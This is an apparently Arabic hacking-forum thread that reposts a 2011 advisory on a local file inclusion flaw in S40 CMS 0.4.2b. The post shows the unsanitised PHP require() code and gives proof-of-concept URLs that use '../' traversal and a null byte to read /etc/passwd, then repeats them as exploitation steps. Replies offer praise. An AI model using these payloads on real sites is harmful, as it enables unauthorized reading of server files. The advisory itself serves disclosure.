اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها

اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها


النتائج 1 إلى 5 من 5

الموضوع: اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها

  1. #1
    محظور
    تاريخ التسجيل
    Feb 2011
    الدولة
    سوريــآآ الأسدَ
    المشاركات
    1,624

    new اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها


    باسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته


    اخر ثغرة تم نزولها في موقع السكيوريتي exploit-db

    الثغرة في سكريبت S40 CMS 0.4.2b LFI Vulnerability
    لنسخة من السكريت : 0.4.2

    رابط تحميل السكريبت : هنا

    الثغرة
    كود PHP:

    ------------------------------------------------------------------------------------------------------------
    [CMS Description]
     
    S40 CMS is FREE Content Management System
    S40 CMS 0.4 beta is lightwieght flat file CMS written on PHP, suitable for small and medium sites.
    S40 is open-source MIT-license CMS developed by AWEN art studio Ltd.
    S40 is fast and easy to customize system with build-in installer.
     
     
    ------------------------------------------------------------------------------------------------------------
    [Security Flaw]
     
    S40 CMS is prone to Local File Inclusion vulnerability because of poor security checks and bad input
    sanitization: GET variables are not properly sanitized before being included via require() PHP function.
     
    [code:index.php]
     
    <?php
    ob_start
    ("ob_gzhandler"); // comment this line to disable gzip compression
    require "inc/config.php";
    require 
    "inc/langs/".$s40[lang] .".php";
    if (
    $s40[installed]){
        require 
    "inc/functions.php";
        
    checkinstall();
        require 
    page($_GET[p],$_GET[c],$_GET[g],$_GET[gp]);
     
    ....
     
    [/
    code]
     
    Having a quick look at page() function, the security issue is clear$pid ($_GET['p']), is not sanitized
    or passed through a valid regular expression before being returned to require() function of index.php file.
     
    [
    code:/inc/functions.php:page():line 13]
     
    function 
    page($pid,$cid,$gid,$gp){
        if(!isset(
    $pid)){
            
    $p "index";
            return 
    "data/".$p.".page.php";
        }else{
            if (isset(
    $pid) and isset($cid)){
                if(!
    file_exists("data/".$pid.".child.".$cid.".php")){
                    return 
    "data/404.inc";
                }else{
                    
    $p $pid;
                    
    $c $cid;
                    return 
    "data/".$p.".child.".$c.".php";
                }
            }else{
                if(!
    file_exists("data/".$pid.".page.php")){
                    return 
    "data/404.inc";
                }else{
                    
    $p $pid;
                    return 
    "data/".$p.".page.php";
                }
            }
        }
    }
    ....
     
    [/
    code]
     
     
    ------------------------------------------------------------------------------------------------------------
    [
    Exploit]
     
    The security issue can be exploited sending a valid path via GET requestNull Byte must be used in
    order to exploit this LFI
    .
     
    PoC : /[cms_path]/?p=[local_file]%00
          
    /[cms_path]/?p=/../../../../../../../etc/passwd%00
     
     
    ------------------------------------------------------------------------------------------------------------
    [
    Credits]
     
    Credit goes to Giovanni Buzzin"Osirys"  for the discover of this vulnerability.
    (
    Meglio)
     
     
    ------------------------------------------------------------------------------------------------------------
    [
    END07/04/2011]
    بعد تحميل السكريبت وتنصيب .~ :في اللوكال هوست localhost

    المعروف لمن لا يعرف البرنامج التحميل من :هنا

    وتنصيب السكريبت في اللوكال هوست

    هدا هو مسار الباسوورد في السكريبت وهي ثغرة LFI


    الاستغلال 1
    كود PHP:
     /[cms_path]/?p=[local_file]%00 
    الاستغلال 2
    كود PHP:
      /[cms_path]/?p=/../../../../../../../etc/passwd%00 

    cms_path : الملف المصاب
    local_file : المتغير


    إهداء الى :
    abdellatef

    SESTYM32

    الكونقرس

    WOKR

    EVEL


    إنشاء الله نكون قد افدناكم

    لا تنسونا بصالح دعائكم

    التعديل الأخير تم بواسطة V!RUS TROJAN ; 04-08-2011 الساعة 12:08 AM

  2. #2

    افتراضي رد: اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها

    يعطيك العافية يا بطلنا على الحصريات الرائعة جدا
    الف شكر حبيبي الاهداء الله يعطيك الصحة
    رابط التغرة :
    http://www.exploit-db.com/exploits/17129/

  3. #3
    محظور
    تاريخ التسجيل
    Feb 2011
    الدولة
    سوريــآآ الأسدَ
    المشاركات
    1,624

    افتراضي رد: اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها

    نوووورت الموضوع حبيبي أحلا مرور

  4. #4

    افتراضي رد: اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها

    مبدع وطريقه فعاله 100 في 10000000000

    اهنيك

    تحيتي
    ^.*

  5. #5
    محظور
    تاريخ التسجيل
    Feb 2011
    الدولة
    سوريــآآ الأسدَ
    المشاركات
    1,624

    افتراضي رد: اخر ما نزل ثغرة S40 CMS 0.4.2b LFI Vulnerability والشرح لها

    اقتباس المشاركة الأصلية كتبت بواسطة M3 nafsk مشاهدة المشاركة
    مبدع وطريقه فعاله 100 في 10000000000

    اهنيك

    تحيتي
    هلا حبيبي نورت الموضىوع

المواضيع المتشابهه

  1. تغرة في 3.7.x و 3.8.x
    بواسطة وحـThuGـش في المنتدى منتدى حماية المواقع والمنتديات
    مشاركات: 5
    آخر مشاركة: 03-12-2012, 04:33 PM
  2. مشاركات: 21
    آخر مشاركة: 06-10-2011, 12:39 PM
  3. Code Mar برنامج لاستغلال تغرة الايميل البديل لسرقة حسابات الهوتميل
    بواسطة silent-killer في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 2
    آخر مشاركة: 01-16-2011, 10:37 AM
  4. الرجو المساعده والشرح للمبتدئين لو سمحت
    بواسطة mostafa.helall في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 3
    آخر مشاركة: 08-29-2010, 01:24 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •